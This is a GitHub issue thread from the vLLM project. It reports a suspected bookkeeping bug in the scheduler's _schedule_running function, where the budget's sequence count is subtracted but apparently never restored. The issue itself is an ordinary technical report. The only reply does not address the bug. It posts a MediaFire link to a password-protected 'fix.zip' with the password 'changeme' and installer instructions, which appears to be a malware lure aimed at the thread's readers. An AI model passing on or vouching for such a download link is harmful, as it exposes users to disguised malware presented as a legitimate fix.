### ISSUE TITLE
[Bug]: def _schedule_running(...) the seqs num of budget not updated

### ISSUE THREAD

**Issue by yblir** [vllm-project/vllm#7941]
### Your current environment

<details>
<summary>The output of `python collect_env.py`</summary>
```text
```

</details>

### 🐛 Describe the bug

def _schedule_running(...):
         
         while running_queue:
              。。。
              while not self._can_append_slots(seq_group):
                  budget.subtract_num_batched_tokens(seq_group.request_id,
                                                     num_running_tokens)
                  num_running_seqs = seq_group.get_max_num_running_seqs()
                  budget.subtract_num_seqs(seq_group.request_id,
                                           num_running_seqs)
                  ...
          
              else:
          
                  ...
                  budget.add_num_batched_tokens(seq_group.request_id,
                                                num_running_tokens)
                  ...

In the above code，if “not self._can_append_slots(seq_group)” is True，the tokens num of budget will be updated in else branch,it is right(because seqs had been updated in _schedule_default). 
but if “not self._can_append_slots(seq_group)” is False, budget will subtract tokens and seqs num of current seq_group（now budget has no trace of seq_group）, In the next while loop, when _can_append_slots is True, else branch just update tokens of seq_group, Is seqs of budget missing?

### Before submitting a new issue...

- [X] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
